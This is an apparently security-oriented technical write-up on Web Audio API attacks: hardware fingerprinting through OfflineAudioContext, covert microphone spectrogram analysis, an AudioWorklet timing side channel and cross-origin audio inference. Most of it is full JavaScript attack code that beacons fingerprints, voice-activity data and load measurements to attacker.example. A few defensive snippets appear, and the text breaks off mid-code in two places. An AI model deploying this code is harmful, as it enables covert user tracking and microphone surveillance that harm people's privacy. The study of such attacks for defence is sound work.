
MCP server Web Audio API security — AudioContext fingerprinting, covert microphone analysis, AudioWorklet timing side-channel, and cross-origin audio inference

The Web Audio API is a DSP graph that runs inside the browser's audio engine. Its nodes (OscillatorNode, DynamicsCompressorNode, AnalyserNode, AudioWorkletNode, MediaElementAudioSourceNode) operate on 32-bit floating-point samples, and a live AudioContext processes them on a real-time audio thread paced by the output device. That proximity to the hardware creates four distinct attack surfaces. OfflineAudioContext rendering produces float32 output that varies with CPU architecture, operating system and browser build, and floating-point rounding, which makes it a zero-permission device fingerprint. A microphone stream acquired via getUserMedia can be routed into an AnalyserNode for continuous voice activity detection without any secondary permission prompt. AudioWorkletProcessor.process() runs on the real-time thread, and drift between its expected block cadence and wall-clock time reveals CPU load, which can undercut the timer coarsening that browsers apply to performance.now() as a Spectre mitigation. And MediaElementAudioSourceNode on a cross-origin audio element creates a binary side channel on whether authenticated content is playing.

How the Web Audio API works and where the attack surface lives

API / property | What it exposes | Attack relevance
OfflineAudioContext | Renders an audio graph to a buffer without producing audible output. Takes channel count, length in sample frames, and sample rate as constructor arguments. startRendering() resolves with an AudioBuffer containing float32 PCM data. | The exact float32 values in the rendered buffer differ by CPU architecture, operating system, and FPU implementation. Summing or hashing the buffer produces a stable device fingerprint with 8+ bits of entropy, requiring zero permissions.
OscillatorNode + DynamicsCompressorNode | OscillatorNode generates a sine wave at a specified frequency. DynamicsCompressorNode applies dynamic range compression using a look-ahead algorithm whose floating-point arithmetic is platform-specific. Connecting them creates the standard AudioFP pipeline. | DynamicsCompressor uses gain reduction calculations that involve logarithms, exponentials, and multiplications: operations whose rounding in the least-significant digits differs across x86, ARM, and MIPS FPUs. The resulting buffer is a hardware fingerprint.
BiquadFilterNode.getFrequencyResponse() | Computes the filter's frequency response at specified frequencies, returning magnitude and phase Float32Arrays. The computation uses the filter's biquad coefficients, which are derived from transcendental functions applied to the sample rate and cutoff frequency. | Alternative fingerprinting surface: the phase/magnitude values returned by getFrequencyResponse() differ by platform and FPU. Requires no rendering; the query is instantaneous. Combines with OfflineAudioContext for higher entropy.
AnalyserNode | Performs real-time FFT analysis on audio data, exposing frequency-domain energy via getByteFrequencyData() (0–255 per frequency bin) and time-domain waveform via getByteTimeDomainData(). Configurable fftSize (32–32768). | When connected to a microphone stream source, provides a continuous spectrogram without any secondary prompt. Voice activity detection and speech pattern timing run silently after the initial getUserMedia grant, which the user may have given days earlier.
AudioWorklet / AudioWorkletProcessor | process() is invoked on a real-time audio thread for every 128-sample block (~2.9ms at 44100Hz). The currentTime property in AudioWorkletGlobalScope advances by exactly 128/sampleRate per call. SharedArrayBuffer enables communication with the main thread. | Wall-clock time between consecutive process() invocations should equal the audio block duration. Deviations reveal CPU/GPU load with sub-millisecond precision, circumventing the 1ms Spectre jitter applied to performance.now() on the main thread.
MediaElementAudioSourceNode | Connects an HTML <audio> or <video> element to the Web Audio graph. For cross-origin media, CORS governs content access; the element can load but its samples may be blocked from the AudioContext analysis graph. | The AnalyserNode receives zero-energy data for CORS-blocked cross-origin media, versus non-zero RMS for playing same-origin or CORS-permitted media. This binary difference is a side channel: it reveals whether an authenticated audio URL is serving content to the current user.

Permission situation: OfflineAudioContext fingerprinting and BiquadFilterNode.getFrequencyResponse() require zero permissions: no prompt, no user gesture, no Permissions Policy opt-in. They can execute silently on page load. Microphone analysis via AnalyserNode requires a getUserMedia({audio: true}) grant, but where the browser persists that grant in its permission store (even one given weeks earlier), later calls resolve without a prompt. The OS recording indicator is tied to the live capture stream opened by getUserMedia, not to what the page does with the samples; attaching an AnalyserNode to an already-acquired stream produces no additional prompt or indicator on most platforms.
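
One way a site can narrow the microphone half of this situation is to switch the feature off for documents that never need it. The sketch below is a minimal illustration, not part of the original write-up: it assumes a Node-style response object exposing setHeader, and the helper name applyAudioHardeningHeaders is hypothetical. It sets the standard Permissions-Policy header with an empty allowlist for microphone. It does nothing about OfflineAudioContext fingerprinting, which is not gated by any policy-controlled feature.

```javascript
// Hypothetical helper: attach a Permissions-Policy header that turns off
// microphone access for the document being served.
// `res` is assumed to expose setHeader(name, value), as Node's http.ServerResponse does.
function applyAudioHardeningHeaders(res) {
  // An empty allowlist "()" disables the feature for this document and its nested frames.
  res.setHeader('Permissions-Policy', 'microphone=()');
  return res;
}

// Usage with a minimal stand-in for a response object:
const recorded = {};
applyAudioHardeningHeaders({
  setHeader(name, value) { recorded[name] = value; },
});
console.log(recorded); // { 'Permissions-Policy': 'microphone=()' }
```

With this header in place, a getUserMedia({audio: true}) call from the document should be rejected regardless of any stored grant for the origin.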

Attack 1: AudioContext hardware fingerprinting via oscillator and compressor pipeline

The AudioFP technique, first documented by Englehardt & Narayanan (2016, CCS) and later independently rediscovered by researchers studying browser fingerprinting defenses, exploits the platform-specificity of floating-point DSP arithmetic. An OfflineAudioContext renders a graph to a buffer as fast as the machine allows, without producing any audible output; startRendering() returns a promise that resolves with the result. When that graph includes a DynamicsCompressorNode, the gain reduction calculations involve exponential and logarithmic operations on the input signal. The rounding in the least-significant digits of these operations depends on the CPU's floating-point and SIMD implementation and on the math routines the browser was compiled with: an x86-64 build using SSE2 can produce different values from an ARM build using NEON, including on Apple Silicon. The operating system matters as well, since browser builds for macOS, Linux, and Windows link different libraries and take different code paths, producing stable but distinctive float32 output per platform. The resulting fingerprint is stable across browser restarts, private browsing, VPN changes, and cookie clears, because it reflects the hardware and software platform, not any stored state.

// ATTACK: AudioContext hardware fingerprinting via OfflineAudioContext oscillator+compressor.
// Produces a stable float32 buffer that differs by CPU architecture (x86/ARM),
// operating system, and browser build.
// Requires ZERO permissions: runs on page load with no user interaction.
// ~8+ bits of entropy, stable across sessions, private browsing, and VPN changes.

async function computeAudioFingerprint() {
  // OfflineAudioContext(channels, frameCount, sampleRate)
  // 1 channel, 44100 * 0.04 = 1764 frames (40ms of audio), 44100 Hz sample rate.
  // The frame count is intentional: 40ms gives the compressor's look-ahead algorithm
  // sufficient time to settle into its steady-state rounding behavior.
  const ctx = new OfflineAudioContext(1, Math.floor(44100 * 0.04), 44100);

  // OscillatorNode at 10000 Hz — well above speech range, into the compressor's
  // non-linear operating region where gain reduction math is most hardware-specific.
  const oscillator = ctx.createOscillator();
  oscillator.type      = 'sine';
  oscillator.frequency.setValueAtTime(10000, ctx.currentTime); // 10 kHz

  // DynamicsCompressorNode with parameters overridden from the defaults.
  // Defaults are: threshold −24dB, knee 30dB, ratio 12, attack 0.003s, release 0.25s.
  // The look-ahead gain reduction uses log/exp operations whose FP rounding
  // is the source of platform-specific divergence.
  const compressor = ctx.createDynamicsCompressor();
  compressor.threshold.setValueAtTime(-50, ctx.currentTime); // Drive compressor hard
  compressor.knee.setValueAtTime(40,  ctx.currentTime);
  compressor.ratio.setValueAtTime(12,  ctx.currentTime);
  compressor.attack.setValueAtTime(0,  ctx.currentTime);
  compressor.release.setValueAtTime(0.25, ctx.currentTime);

  // Pipeline: OscillatorNode → DynamicsCompressorNode → destination
  oscillator.connect(compressor);
  compressor.connect(ctx.destination);

  // Start the oscillator at time 0 — it runs for the entire 40ms render window
  oscillator.start(0);

  // Render offline — no audio output, no UI, no permission prompt
  const renderedBuffer = await ctx.startRendering();

  // Read the float32 samples from channel 0
  const samples = renderedBuffer.getChannelData(0); // Float32Array of 1764 values

  // Reduce the buffer to a single number by summing sample values.
  // Platform-specific rounding means even a single-bit difference in any summed
  // sample changes the result.
  // Only the last 100 values are summed, where the compressor state has settled.
  const settledSamples = samples.slice(-100);
  const rawSum = settledSamples.reduce((acc, val) => acc + val, 0);

  // Additional fingerprinting surface: BiquadFilterNode.getFrequencyResponse()
  // This is an instantaneous computation — no rendering needed.
  // Hardware-specific DSP coefficients produce different magnitude/phase outputs.
  const biquad = ctx.createBiquadFilter();
  biquad.type = 'lowpass';
  biquad.frequency.value = 1000;
  biquad.Q.value = 0.5;

  // Query frequency response at 100 logarithmically spaced points
  const testFrequencies = new Float32Array(100).map((_, i) =>
    20 * Math.pow(22050 / 20, i / 99)  // 20 Hz to 22050 Hz
  );
  const magResponse   = new Float32Array(100);
  const phaseResponse = new Float32Array(100);
  biquad.getFrequencyResponse(testFrequencies, magResponse, phaseResponse);

  // Hash the magnitude response for a second fingerprint value
  const biquadSum = Array.from(magResponse).reduce((a, b) => a + b, 0);

  // Combine both signals into a composite fingerprint
  const fingerprint = {
    oscillatorSum:   rawSum,
    biquadMagSum:    biquadSum,
    // The pair (oscillatorSum, biquadSum) is stable per device and differs across
    // platforms. Machines with the same hardware, OS, and browser build generally
    // produce the same values, so the pair identifies a device class, not one device.
    compositeHash: (rawSum * 1e10).toFixed(0) + ':' + (biquadSum * 1e6).toFixed(0),
  };

  navigator.sendBeacon('https://attacker.example/audio-fp', JSON.stringify({
    fingerprint,
    userAgent:        navigator.userAgent,
    hardwareConcurrency: navigator.hardwareConcurrency,
    origin:           location.origin,
    ts:               Date.now(),
  }));

  return fingerprint;
}

// Run on page load — zero user interaction required, completely silent
computeAudioFingerprint();

Why this fingerprint is durable: Unlike cookie-based tracking, the AudioFP fingerprint cannot be cleared by the user. It is a function of the hardware and the software platform, not of any stored browser state. Private browsing windows, VPN connections, and even a fresh installation of the same browser on the same machine produce the same fingerprint. Built-in mitigations include Firefox's fingerprinting resistance (which rounds AudioContext output to reduce entropy) and Tor Browser (which returns a fixed constant). Chrome and most Chromium-based browsers expose the raw values with no jitter or quantization by default; Safari's behavior depends on version and browsing mode.
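
To make the sensitivity of the summation step concrete, the following sketch uses a synthetic buffer in place of real rendered audio. It nudges one sample by a single unit in the last place and shows that the plain sum changes, then shows that rounding samples to a coarser step before summing hides the difference. The helper names and the 1e-4 step are assumptions chosen for the demonstration; this illustrates the general idea of quantization, not any browser's actual implementation.

```javascript
// Move a float32 value by one unit in the last place (1 ULP) by bumping its bit pattern.
function nudgeOneUlp(x) {
  const f32 = new Float32Array([x]);
  const bits = new Uint32Array(f32.buffer);
  bits[0] += 1;
  return f32[0];
}

// Plain summation, the same reduction the fingerprint listing applies.
function sumSamples(samples) {
  let acc = 0;
  for (const s of samples) acc += s;
  return acc;
}

// Illustrative quantization: round each sample to a fixed step before summing.
// The step size is an assumption for this demo, not a real browser setting.
function quantize(samples, step = 1e-4) {
  return Array.from(samples, (s) => Math.round(s / step) * step);
}

// Synthetic "rendered" buffer and a copy that differs in one sample by 1 ULP.
const deviceA = Float32Array.from({ length: 100 }, (_, i) => 0.5 * Math.sin(i * 0.1));
const deviceB = deviceA.slice();
deviceB[42] = nudgeOneUlp(deviceB[42]);

const rawDiffers = sumSamples(deviceA) !== sumSamples(deviceB);
const quantizedDiffers = sumSamples(quantize(deviceA)) !== sumSamples(quantize(deviceB));
console.log({ rawDiffers, quantizedDiffers }); // { rawDiffers: true, quantizedDiffers: false }
```

The design point is that the attack relies on the least-significant bits surviving into the hash, so any defense that discards or randomizes those bits removes most of the signal.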

Attack 2: Microphone analysis via getUserMedia and AudioContext without a visible indicator

When a web application calls navigator.mediaDevices.getUserMedia({audio: true}), the browser shows a permission prompt and, on most operating systems, a recording indicator appears (a dot in the browser tab, the orange dot in the macOS menu bar, or a microphone icon in the Windows system tray). The indicator is triggered by the open capture stream, not by the downstream audio processing. Once the user has granted microphone access, even in a previous session if the origin holds a persistent permission in the browser's permission store, an MCP tool can call getUserMedia with no prompt, route the resulting MediaStream into a MediaStreamAudioSourceNode, and feed it through an AnalyserNode. Many users do not associate the indicator with the specific web content processing audio, and the AnalyserNode's frequency analysis runs entirely within the browser without any additional OS-level notification. Polling at 30Hz via setInterval, the tool builds a running spectrogram (frequency band energy over time) that enables voice activity detection and speech vs. music classification, and with finer-grained bands could support coarse speaker characterization by vocal frequency envelope.

// ATTACK: Silent microphone analysis via getUserMedia + AnalyserNode.
// After a single getUserMedia grant (which the user may have given previously),
// a persistent permission allows silent re-acquisition of the stream.
// AnalyserNode processing runs in the browser — the OS indicator activates on
// getUserMedia, but the analysis itself is invisible to the user.
// Voice activity detection at 30Hz reveals speech presence, cadence, and vocal patterns.

class CovertMicrophoneAnalyser {
  constructor() {
    this.audioCtx  = null;
    this.analyser  = null;
    this.freqData  = null;
    this.pollTimer = null;
    this.vadHistory = [];  // Voice Activity Detection history (speech/silence labels)
    this.spectrogramBuffer = []; // Rolling spectrogram — frequency vectors over time
  }

  async start() {
    // getUserMedia — if the origin already has a persistent permission grant,
    // this resolves immediately with no visible browser prompt.
    // The OS recording indicator (macOS orange dot, Windows system tray mic) activates here.
    const stream = await navigator.mediaDevices.getUserMedia({
      audio: {
        echoCancellation: false,   // Raw signal — no browser post-processing
        noiseSuppression: false,   // Preserve ambient noise (useful for environment profiling)
        autoGainControl:  false,   // Preserve true amplitude — needed for RMS calculation
        sampleRate:       44100,   // Full bandwidth — capture up to 22kHz
      }
    });

    this.audioCtx = new AudioContext({ sampleRate: 44100 });

    // Connect the microphone stream to the Web Audio graph
    const source = this.audioCtx.createMediaStreamSource(stream);

    // AnalyserNode: FFT size 2048 → 1024 frequency bins, each ~21.5Hz wide
    // This resolution is sufficient to distinguish speech (300–3400Hz),
    // music (wide band with harmonic structure), and ambient noise (low-frequency flat).
    this.analyser = this.audioCtx.createAnalyser();
    this.analyser.fftSize = 2048;
    this.analyser.smoothingTimeConstant = 0.4; // Moderate smoothing — tracks fast transients

    source.connect(this.analyser);
    // NOTE: Do NOT connect analyser to audioCtx.destination —
    // that would produce audible output. The graph terminates at the analyser,
    // making the analysis completely silent.

    this.freqData = new Uint8Array(this.analyser.frequencyBinCount); // 1024 bins

    // Poll the frequency data at 30Hz (~33ms interval)
    // At 30Hz, we capture ~1800 frequency vectors per minute — sufficient for
    // a detailed spectrogram and voice activity detection.
    this.pollTimer = setInterval(() => this.poll(), 33);
  }

  poll() {
    this.analyser.getByteFrequencyData(this.freqData); // Writes 0–255 into freqData

    // Divide the 1024 bins (0–22050 Hz) into 4 functional bands:
    // Bin index = frequency / (sampleRate / fftSize) = frequency / 21.53
    //   Sub-bass / rumble:   0–150 Hz    → bins 0–6
    //   Speech fundamental:  150–3400 Hz → bins 7–157
    //   Presence / sibilance: 3400–8000 Hz → bins 158–371
    //   Air / HF:            8000–22050 Hz → bins 372–1023
    const subBass   = this.bandEnergy(0,   6);
    const speech    = this.bandEnergy(7,   157);
    const presence  = this.bandEnergy(158, 371);
    const air       = this.bandEnergy(372, 1023);

    // RMS energy across the full spectrum — overall loudness
    let sumSq = 0;
    for (let i = 0; i < this.freqData.length; i++) {
      const normalized = this.freqData[i] / 255;
      sumSq += normalized * normalized;
    }
    const rms = Math.sqrt(sumSq / this.freqData.length);

    // Voice Activity Detection: classify each frame.
    // RMS below 0.04 → silence; speech-band energy above 40 that dominates the
    // sub-bass and air bands → speech; otherwise music, ambient noise, or unknown.
    const vadLabel = this.classifyFrame(rms, subBass, speech, presence, air);

    this.vadHistory.push({ ts: Date.now(), rms, vadLabel });
    this.spectrogramBuffer.push({
      ts:       Date.now(),
      subBass,
      speech,
      presence,
      air,
      rms,
      vadLabel,
    });

    // Exfiltrate every 5 seconds (150 frames at 30Hz)
    if (this.spectrogramBuffer.length >= 150) {
      this.exfiltrate();
      this.spectrogramBuffer = [];
    }
  }

  bandEnergy(startBin, endBin) {
    // Mean energy (0–255) across the specified bin range
    let sum = 0;
    for (let i = startBin; i <= endBin; i++) sum += this.freqData[i];
    return sum / (endBin - startBin + 1);
  }

  classifyFrame(rms, subBass, speech, presence, air) {
    // Silence: overall RMS below noise floor threshold
    if (rms < 0.04) return 'silence';

    // Speech: dominant energy in 150–3400 Hz band, harmonic structure
    // (presence energy typically 40–70% of speech energy for voiced consonants)
    if (speech > 40 && speech > subBass * 2 && speech > air * 3) {
      if (presence > 20) return 'speech'; // Voiced speech with sibilance
      return 'voiced';                    // Pure voiced vowels
    }

    // Music: broadband energy including air band, sustained energy
    if (air > 15 && presence > 25 && rms > 0.15) return 'music';

    // Ambient noise: low-frequency dominant, flat spectrum
    if (subBass > speech && rms < 0.12) return 'ambient';

    return 'unknown';
  }

  exfiltrate() {
    // Speech timing analysis: count speech frames, measure phrase durations
    const speechFrames  = this.vadHistory.filter(f => f.vadLabel === 'speech' || f.vadLabel === 'voiced');
    const speechFraction = speechFrames.length / (this.vadHistory.length || 1);

    // Phrase duration: consecutive speech frames form a phrase
    let phrases = 0, inPhrase = false;
    for (const f of this.vadHistory) {
      const isSpeech = f.vadLabel === 'speech' || f.vadLabel === 'voiced';
      if (isSpeech && !inPhrase)  { phrases++; inPhrase = true; }
      if (!isSpeech && inPhrase)  { inPhrase = false; }
    }

    navigator.sendBeacon('https://attacker.example/mic-analysis', JSON.stringify({
      spectrogram:     this.spectrogramBuffer,
      speechFraction,
      phraseCount:     phrases,
      windowMs:        150 * 33,   // ~5 seconds of data
      origin:          location.origin,
      ts:              Date.now(),
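    }));

    // Reset the VAD history so the next report covers only its own ~5 second window
    // and the array does not grow without bound.
    this.vadHistory = [];
  }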

  stop() {
    clearInterval(this.pollTimer);
    this.audioCtx?.close();
  }
}

// Instantiate after getUserMedia has been granted (may already be in permission store)
const micAnalyser = new CovertMicrophoneAnalyser();
micAnalyser.start().catch(() => {
  // getUserMedia denied — silently abort. No error visible to the user.
});
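
The band boundaries in the listing above follow from the bin width, sampleRate / fftSize. The short sketch below reproduces that arithmetic so the bin ranges can be checked or recomputed for other settings; the helper names are hypothetical, and the floor convention matches how the listing assigns edge frequencies to bins.

```javascript
// Width of one AnalyserNode frequency bin in Hz.
function binWidthHz(sampleRate, fftSize) {
  return sampleRate / fftSize;
}

// Index of the bin a frequency falls into, using the floor convention.
function frequencyToBin(frequencyHz, sampleRate, fftSize) {
  return Math.floor(frequencyHz / binWidthHz(sampleRate, fftSize));
}

const SAMPLE_RATE = 44100;
const FFT_SIZE = 2048;

console.log(binWidthHz(SAMPLE_RATE, FFT_SIZE).toFixed(2)); // 21.53
console.log(frequencyToBin(150, SAMPLE_RATE, FFT_SIZE));   // 6
console.log(frequencyToBin(3400, SAMPLE_RATE, FFT_SIZE));  // 157
console.log(frequencyToBin(8000, SAMPLE_RATE, FFT_SIZE));  // 371
```

At a 48000 Hz context rate the same frequencies land in different bins, so hard-coded indices like those in the listing only hold for the 44100 Hz / 2048 configuration.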

OS indicator vs. processing visibility gap: On macOS, the orange dot appears in the Control Center when any application holds a microphone stream — including a browser tab that called getUserMedia. However, users commonly grant microphone access to conferencing apps and then leave the permission in place. An MCP tool that calls getUserMedia on an origin that already has a persistent permission grant will open the stream without a new prompt, and the orange dot will appear — but many users attribute it to their video call app already running. The AnalyserNode processing runs entirely within the browser process with no OS-level notification beyond the indicator already visible from the getUserMedia call.
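
Because the indicator tracks the open stream, legitimate code that is finished with the microphone should end capture explicitly. The stop() method in the listing above closes the AudioContext but never stops the stream's tracks, so capture would continue. The sketch below shows one way to release both; releaseMicrophone is a hypothetical helper, and the stand-in objects exist only so the example runs outside a browser.

```javascript
// Stop every track on a MediaStream and close the AudioContext that consumed it.
// `stream` is assumed to expose getTracks(); `audioCtx` is assumed to expose
// `state` and `close()`, as MediaStream and AudioContext do in browsers.
function releaseMicrophone(stream, audioCtx) {
  for (const track of stream.getTracks()) {
    track.stop(); // Ends capture for this track
  }
  if (audioCtx && audioCtx.state !== 'closed') {
    return audioCtx.close(); // Promise that resolves once the context is torn down
  }
  return Promise.resolve();
}

// Stand-ins so the sketch can run outside a browser.
const fakeTrack = { stopped: false, stop() { this.stopped = true; } };
const fakeStream = { getTracks: () => [fakeTrack] };
const fakeCtx = {
  state: 'running',
  close() { this.state = 'closed'; return Promise.resolve(); },
};

releaseMicrophone(fakeStream, fakeCtx);
console.log(fakeTrack.stopped, fakeCtx.state); // true closed
```

In a real page, the arguments would be the MediaStream returned by getUserMedia and the AudioContext it was connected to.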

Attack 3: AudioWorklet timing side-channel for CPU and GPU load inference

AudioWorkletProcessor.process() is invoked by the browser's real-time audio thread once per 128-sample block. At a 44100 Hz sample rate, that is one invocation every 128 / 44100 ≈ 2.902 milliseconds. The currentTime property in AudioWorkletGlobalScope advances by exactly this quantum per call: it is an audio-clock value, not a wall-clock value. Measuring load therefore needs a separate wall-clock reference to compare against the audio clock, for example a timestamp taken on the main thread next to the processor's block count. When the machine is busy, the audio thread is scheduled late by the OS, and the wall-clock time between consecutive process() calls exceeds the audio-quantum duration. Averaged over many blocks, this provides a CPU load oracle with sub-millisecond resolution, which is finer than performance.now() on the main thread where browsers coarsen and jitter the timer (to as much as 1ms) as a Spectre mitigation. The audio thread, being a real-time thread with OS priority scheduling, is jittered less aggressively. A SharedArrayBuffer passes timing data from the audio thread back to the main thread for analysis and exfiltration.
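
The quantum arithmetic above is easy to verify. The sketch below computes the block duration and the number of process() calls per second of audio time for two common sample rates; the function names are hypothetical, and 128 frames is the block size the text describes.

```javascript
const RENDER_QUANTUM_FRAMES = 128; // Block size described for process()

// Duration of one render quantum in milliseconds.
function renderQuantumMs(sampleRate) {
  return (RENDER_QUANTUM_FRAMES / sampleRate) * 1000;
}

// Number of process() calls per second of audio time.
function blocksPerSecond(sampleRate) {
  return sampleRate / RENDER_QUANTUM_FRAMES;
}

for (const rate of [44100, 48000]) {
  console.log(rate, renderQuantumMs(rate).toFixed(3), blocksPerSecond(rate).toFixed(1));
}
// 44100 2.902 344.5
// 48000 2.667 375.0
```

Any measured interval between blocks is only meaningful relative to these expected values, which is why the sample rate has to be known to the code doing the comparison.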

// ATTACK: AudioWorklet timing side-channel for CPU/GPU load inference.
// AudioWorklet.process() runs in the real-time audio thread at exactly 128-sample intervals.
// Expected wall-clock delta per block: 128/44100 ≈ 2.902ms.
// When the CPU is under load, the audio thread is starved → wall-clock delta > expected delta.
// This provides a higher-precision CPU load oracle than performance.now() (which is jittered).

// --- AudioWorklet processor (must be loaded as a separate module via addModule) ---
// File: /mcp-timing-processor.js (registered with audioCtx.audioWorklet.addModule())
const WORKLET_CODE = `
class TimingProbeProcessor extends AudioWorkletProcessor {
  constructor(options) {
    super(options);
    // SharedArrayBuffer for lock-free communication with main thread.
    // Layout: [lastWallClockMs (f64), drift accumulator (f64), block count (i32)]
    // Passed via processorOptions from main thread.
    this.sharedBuf = options.processorOptions.sharedBuffer;
    this.f64View   = new Float64Array(this.sharedBuf);
    this.i32View   = new Int32Array(this.sharedBuf, 16); // Offset past two f64s

    this.lastWallClock = 0;
    this.blockCount    = 0;
    // Audio-quantum duration: 128 samples / sampleRate
    this.expectedDelta = 128 / sampleRate; // In seconds, matching currentTime units
  }

  process(inputs, outputs, parameters) {
    // currentTime is the audio clock: it advances exactly expectedDelta per block.
    // It is NOT a wall-clock value; it tracks rendered samples, not real time.
    const audioTime = currentTime; // Seconds, audio clock

    this.blockCount++;

    // Audio time implied by the number of blocks this processor has handled.
    const expectedAudioTime = this.blockCount * this.expectedDelta;

    // Caveat: both terms derive from the audio clock, so this difference stays
    // essentially constant from block to block. Relating it to CPU load needs a
    // wall-clock reference, which in this example is only the performance.now()
    // reading the main thread takes alongside blockCount.
    const drift = audioTime - expectedAudioTime;

    // Write to SharedArrayBuffer for main thread to read
    // Index 0: current audio time (f64)
    // Index 1: cumulative drift (f64)
    this.f64View[0] = audioTime;
    this.f64View[1] += Math.abs(drift); // Accumulate absolute drift — load indicator
    Atomics.add(this.i32View, 0, 1);    // Increment block count atomically

    // Pass silence through — no audio output needed for the side channel
    const output = outputs[0];
    for (const channel of output) channel.fill(0);

    return true; // Keep processor alive
  }
}

registerProcessor('timing-probe', TimingProbeProcessor);
`;

// --- Main thread setup ---
async function setupAudioWorkletTimingProbe() {
  const audioCtx = new AudioContext({ sampleRate: 44100 });

  // SharedArrayBuffer requires COOP/COEP headers (cross-origin isolation).
  // In Electron and many MCP-enabled environments these are already set.
  // Layout: 2 × f64 (16 bytes) + 1 × i32 (4 bytes), padded to 32 bytes
  const sharedBuffer = new SharedArrayBuffer(32);
  const f64View      = new Float64Array(sharedBuffer);
  const i32View      = new Int32Array(sharedBuffer, 16);

  // Register the worklet module from a Blob URL (avoids external file requirement)
  const blob    = new Blob([WORKLET_CODE], { type: 'application/javascript' });
  const blobUrl = URL.createObjectURL(blob);
  await audioCtx.audioWorklet.addModule(blobUrl);
  URL.revokeObjectURL(blobUrl);

  // Create the AudioWorkletNode, passing the SharedArrayBuffer
  const probeNode = new AudioWorkletNode(audioCtx, 'timing-probe', {
    processorOptions: { sharedBuffer },
    numberOfInputs:   0,
    numberOfOutputs:  1,
    outputChannelCount: [1],
  });

  // Connect to destination so the rendering graph pulls this node.
  // (Nodes with no path to the destination are not guaranteed to be processed.)
  probeNode.connect(audioCtx.destination);

  // --- Main thread: sample the shared buffer periodically ---
  const samples = [];
  const expectedBlocksPerSecond = 44100 / 128; // ~344.5 blocks/s

  const sampleInterval = setInterval(() => {
    const audioTime       = f64View[0];
    const cumulativeDrift = f64View[1];
    const blockCount      = Atomics.load(i32View, 0);

    // Wall-clock time for the main thread
    const wallMs = performance.now();

    // Expected audio time based on block count
    const expectedTime = blockCount * (128 / 44100);

    // CPU load indicator: ratio of cumulative drift to expected audio time
    // Higher ratio → more CPU starvation of the audio thread → more system load
    const loadIndicator = cumulativeDrift / (expectedTime || 1);

    samples.push({
      wallMs,
      audioTime,
      blockCount,
      cumulativeDrift,
      loadIndicator,
    });

    // After 30 samples (~30 seconds), analyze the load profile
    if (samples.length >= 30) {
      clearInterval(sampleInterval);
      analyzeAndExfiltrate(samples);
    }
  }, 1000); // Sample once per second
}

function analyzeAndExfiltrate(samples) {
  // Compute load trend: is load increasing (other tasks starting)?
  const loadValues   = samples.map(s => s.loadIndicator);
  const meanLoad     = loadValues.reduce((a, b) => a + b, 0) / loadValues.length;
  const maxLoad      = Math.max(...loadValues);
  const loadVariance = loadValues.reduce((a, v) => a + (v - meanLoad) ** 2, 0) / loadValues.length;

  // High variance → intermittent load spikes (GPU rendering, other MCP tools, extensions)
  // High mean load → sustained CPU pressure (background processes)

  navigator.sendBeacon('https://attacker.example/timing-probe', JSON.stringify({
    meanLoadIndicator: meanLoad,
    maxLoadIndicator:  maxLoad,
    loadVariance,
    sampleCount:       samples.length,
    // High loadVariance indicates another MCP tool or browser extension running workloads.
    // Timing load spikes against known operations can reveal what background tasks are active.
    origin:            location.origin,
    ts:                Date.now(),
  }));
}

setupAudioWorkletTimingProbe();

Why this bypasses Spectre mitigations: Browsers coarsen and jitter performance.now() and Date.now() on the main thread (to as much as 1ms, depending on the browser and on whether the page is cross-origin isolated) specifically to reduce the precision of timing attacks used in Spectre-style cache-timing exploits. The real-time audio thread, however, operates at OS scheduler priority levels typically reserved for audio work, and the currentTime audio clock is a sample counter, not a wall clock, so the coarsening does not apply to it. Comparing block count against a wall-clock reference over many blocks yields an averaged drift estimate with sub-millisecond effective resolution, restoring some of the timing precision that browsers deliberately degrade on the main thread. This makes the AudioWorklet timing oracle potentially useful for synchronizing micro-architectural side-channel attacks that require precise timing.
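
The probe depends on SharedArrayBuffer, which the setup comments note requires COOP/COEP headers. A page or an auditor can check both prerequisites at runtime. The sketch below assumes the standard crossOriginIsolated global; the helper name sharedMemoryExposure is hypothetical, and the stand-in objects are there only so it runs outside a browser.

```javascript
// Report whether the two prerequisites for a SharedArrayBuffer-based probe are present.
// `scope` defaults to globalThis; in a browser that is the window or worker global.
function sharedMemoryExposure(scope = globalThis) {
  return {
    hasSharedArrayBuffer: typeof scope.SharedArrayBuffer === 'function',
    // crossOriginIsolated is true only when the page was served with COOP and COEP headers.
    crossOriginIsolated: scope.crossOriginIsolated === true,
  };
}

// Stand-in globals for an isolated and a non-isolated page.
const isolated = sharedMemoryExposure({ SharedArrayBuffer, crossOriginIsolated: true });
const plain = sharedMemoryExposure({ crossOriginIsolated: false });
console.log(isolated); // { hasSharedArrayBuffer: true, crossOriginIsolated: true }
console.log(plain);    // { hasSharedArrayBuffer: false, crossOriginIsolated: false }
```

If both values are false for a given deployment, the SharedArrayBuffer channel described here is unavailable there, although a processor could still report through its message port at lower fidelity.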

Attack 4: Cross-origin audio content inference via MediaElementAudioSourceNode

An HTML <audio> element that loads a cross-origin URL is subject to the browser's Same-Origin Policy: the element can load and play the audio (browsers do not block cross-origin media loading by default), but connecting it to a MediaElementAudioSourceNode triggers CORS enforcement. If the element was not loaded in CORS mode, or the server does not include a permissive Access-Control-Allow-Origin header, the connection succeeds at the API level but the AnalyserNode receives zeroed-out samples: the CORS block silences the audio graph's view of the content. This creates a binary side channel: where the graph can read the media, a URL that serves actual audio content for authenticated users produces non-zero RMS energy in the AnalyserNode, while the same URL serving silence (or blocked by CORS) produces ~0.0 RMS. An MCP tool can probe this binary signal to infer the user's authentication state on a cross-origin service. Practical examples: a payment system's audio confirmation jingle (served only after a successful transaction), a voice message playback URL (non-zero energy only if the user has unread messages), or a personalized audio greeting (different content per logged-in user). Each probed URL reveals one bit of cross-origin state about the current user.

// ATTACK: Cross-origin audio content inference via MediaElementAudioSourceNode + AnalyserNode.
// A cross-origin 

Distinguishing CORS block from silence: The key insight is that a CORS-blocked MediaElementAudioSourceNode silences the Web Audio graph but does not prevent the <audio> element from loading content. The duration property of a cross-origin audio element loaded without crossOrigin='anonymous' reports the actual media duration (since media duration is exposed in the loadedmetadata event regardless of CORS). Combining a CORS-restricted AnalyserNode probe (which sees silence when blocked) with a no-cors duration check (which reports actual content presence) creates a reliable binary authentication oracle: duration > 0 and RMS ≈ 0 confirms CORS block on actual content, meaning the user is authenticated to the cross-origin service.
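
The decision logic in the paragraph above reduces to a small truth table. The sketch below encodes it as a pure function over two already-measured values so the cases are explicit; the function name, the label strings, and the 0.01 silence threshold are all assumptions made for illustration.

```javascript
// Interpret a pair of measurements from the two probes described above.
// durationSeconds: the media element's reported duration (NaN if nothing loaded).
// rms: energy seen by the AnalyserNode, normalized to the range 0..1.
// silenceThreshold: assumed cutoff below which the graph is treated as silent.
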